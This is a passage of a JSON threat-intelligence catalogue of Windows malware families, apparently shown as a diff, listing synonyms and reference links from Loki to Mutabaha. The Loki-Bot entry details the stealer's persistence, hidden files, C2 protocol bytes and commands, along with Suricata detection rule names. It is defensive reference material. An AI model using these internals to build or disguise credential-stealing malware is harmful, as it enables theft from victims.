"https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", - "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", - "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", - "https://github.com/R3MRUM/loki-parse", - "http://www.malware-traffic-analysis.net/2017/06/12/index.html", - "http://blog.fernandodominguez.me/lokis-antis-analysis/", - "https://phishme.com/loki-bot-malware/", - "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", - "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", - "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] - }, - "uuid": "b8fa5036-813f-4887-b4d4-bb17b4a7eba0", - "value": "Loki Password Stealer (PWS)", - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", - "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", - "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", - "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", - "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", - "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/" - ] - }, - "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", - "value": "Luminosity RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk", - "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader" - ] - }, - "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776", - "value": "Lurk", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo" - ] - }, - "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2", - "value": "Luzo", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Lucky Locker", - "Adneukine", - "Bomba Locker" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit", - "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", - "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", - "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" - ] - }, - "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a", - "value": "Lyposit", - "description": "" - }, - { - "meta": { - "synonyms": [ - "El Machete" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", - "https://securelist.com/el-machete/66108/", - "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", - "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6" - ] - }, - "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff", - "value": "Machete", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax", - "https://www.arbornetworks.com/blog/asert/mad-max-dga/" - ] - }, - "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de", - "value": "MadMax", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala", - "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/" - ] - }, - "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b", - "value": "Magala", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", - "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", - "https://www.youtube.com/watch?v=lqWJaaofNf4", - "http://asec.ahnlab.com/1124" - ] - }, - "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", - "value": "Magniber", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos", - "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" - ] - }, - "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9", - "value": "MajikPos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", - "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", - "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" - ] - }, - "uuid": "996e73e9-b093-4987-9992-f52008e55b24", - "value": "Makadocs", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader", - "https://twitter.com/James_inthe_box/status/1046844087469391872" - ] - }, - "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82", - "value": "MakLoader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub", - "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/", - "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", - "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/" - ] - }, - "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2", - "value": "Maktub", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos", - "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf" - ] - }, - "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7", - "value": "MalumPOS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "HDDCryptor", - "DiskCryptor" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", - "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/", - "https://securelist.com/the-return-of-mamba-ransomware/79403/" - ] - }, - "uuid": "df320366-7970-4af0-b1f4-9f9492dede53", - "value": "Mamba", - "description": "" - }, - { - "meta": { - "synonyms": [ - "CryptoHost" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt", - "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/", - "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route" - ] - }, - "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944", - "value": "ManameCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [ - "junidor", - "mengkite", - "vedratve" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", - "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" - ] - }, - "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0", - "value": "Mangzamel", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware", - "https://twitter.com/struppigel/status/811587154983981056" - ] - }, - "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2", - "value": "Manifestus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", - "value": "ManItsMe", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14", - "value": "MAPIget", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", - "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" - ] - }, - "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb", - "value": "Marap", - "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. It is written in C and contains a few notable anti-analysis features." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker", - "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/" - ] - }, - "uuid": "59717468-271e-4d15-859a-130681c17ddb", - "value": "Matrix Banker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom" - ] - }, - "uuid": "118ced99-5942-497f-885a-2b25d0569b4b", - "value": "Matrix Ransom", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", - "http://www.clearskysec.com/tulip/" - ] - }, - "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d", - "value": "Matryoshka RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu", - "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf" - ] - }, - "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", - "value": "Matsnu", - "description": "" - }, - { - "meta": { - "synonyms": [ - "DexLocker" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock", - "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", - "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100", - "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d", - "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html" - ] - }, - "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", - "value": "MBRlock", - "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts." - }, - { - "meta": { - "synonyms": [ - "MyBios" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi", - "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", - "https://www.symantec.com/connect/blogs/bios-threat-showing-again", - "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/", - "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/" - ] - }, - "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", - "value": "Mebromi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.medre", - "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html" - ] - }, - "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4", - "value": "Medre", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", - "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/", - "https://news.drweb.com/show/?i=10302&lng=en", - "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", - "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/" - ] - }, - "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", - "value": "win.medusa", - "description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei" - ] - }, - "uuid": "48cb12ee-c60a-46cd-b376-39226027c616", - "value": "Mewsei", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha", - "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" - ] - }, - "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5", - "value": "Miancha", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass", - "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] - }, - "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", - "value": "Micrass", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", - "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", - "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf" - ] - }, - "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa", - "value": "Microcin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", - "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", - "https://research.checkpoint.com/apt-attack-middle-east-big-bang/" - ] - }, - "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae", - "value": "Micropsia", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" - ] - }, - "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8", - "value": "Mikoponi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - }, - "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", - "value": "MILKMAID", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", - "https://github.com/gentilkiwi/mimikatz", - " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", - "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle" - ] - }, - "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", - "value": "MimiKatz", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", - "value": "MiniASP", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", - "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" - ] - }, - "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae", - "value": "Mirage", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox", - "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" - ] - }, - "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30", - "value": "MirageFox", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", - "https://twitter.com/PhysicalDrive0/status/830070569202749440", - "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", - "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html" - ] - }, - "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", - "value": "Mirai", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat", - "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" - ] - }, - "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8", - "value": "Misdat", - "description": "" - }, - { - "meta": { - "synonyms": [ - "MixFox", - "ModPack" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" - ] - }, - "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", - "value": "Misfox", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref" - ] - }, - "uuid": "4c786624-4a55-46e6-849d-b65552034235", - "value": "Miuref", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core", - "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" - ] - }, - "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd", - "value": "MM Core", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat", - "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/" - ] - }, - "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e", - "value": "MobiRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton" - ] - }, - "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d", - "value": "Mocton", - "description": "" - }, - { - "meta": { - "synonyms": [ - "straxbot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos", - "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", - "https://twitter.com/physicaldrive0/status/670258429202530306" - ] - }, - "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", - "value": "ModPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker", - "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", - "https://breakingmalware.com/malware/moker-part-2-capabilities/", - "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network", - "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/" - ] - }, - "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4", - "value": "Moker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", - "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" - ] - }, - "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", - "value": "Mokes", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole", - "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware", - "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" - ] - }, - "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", - "value": "Mole", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", - "http://www.clearskysec.com/iec/", - "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf" - ] - }, - "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a", - "value": "Molerat Loader", - "description": "" - }, - { - "meta": { - "synonyms": [ - "CoinMiner" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", - "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" - ] - }, - "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", - "value": "Monero Miner", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind", - "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" - ] - }, - "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", - "value": "MoonWind", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine" - ] - }, - "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32", - "value": "Morphine", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto", - "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", - "https://www.f-secure.com/weblog/archives/00002227.html", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" - ] - }, - "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", - "value": "Morto", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", - "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", - "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/" - ] - }, - "uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba", - "value": "Mosquito", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure" - ] - }, - "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394", - "value": "Moure", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart", - "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html" - ] - }, - "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1", - "value": "mozart", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpk", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] - }, - "uuid": "a37c826a-bb30-49fb-952a-63b1cab366c3", - "value": "MPK", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] - }, - "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", - "value": "MPKBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos", - "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", - "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/" - ] - }, - "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146", - "value": "Multigrain POS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] - }, - "uuid": "2685ea45-06f4-46e0-9397-eff8844db855", - "value": "murkytop", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet" - ] - }, - "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec", - "value": "Murofet", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha", - "http://vms.drweb.ru/virus/?_is=1&i=8477920" 